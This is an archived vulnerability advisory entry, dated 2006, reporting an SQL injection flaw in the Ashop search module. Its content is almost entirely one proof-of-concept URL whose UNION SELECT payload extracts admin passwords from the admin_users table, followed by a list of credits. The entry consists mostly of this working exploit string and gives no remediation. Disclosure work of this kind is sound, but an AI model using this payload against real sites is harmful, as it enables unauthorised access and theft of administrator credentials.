Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13242
HistoryJun 18, 2006 - 12:00 a.m.

Ashop Search Module SQL injection

2006-06-1800:00:00
vulners.com
27

http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2Cadmin_password%2C3%2C4+from+admin_users+%27+&cmdSearch=Search

credits: EntriKa & The_BeKiR & erne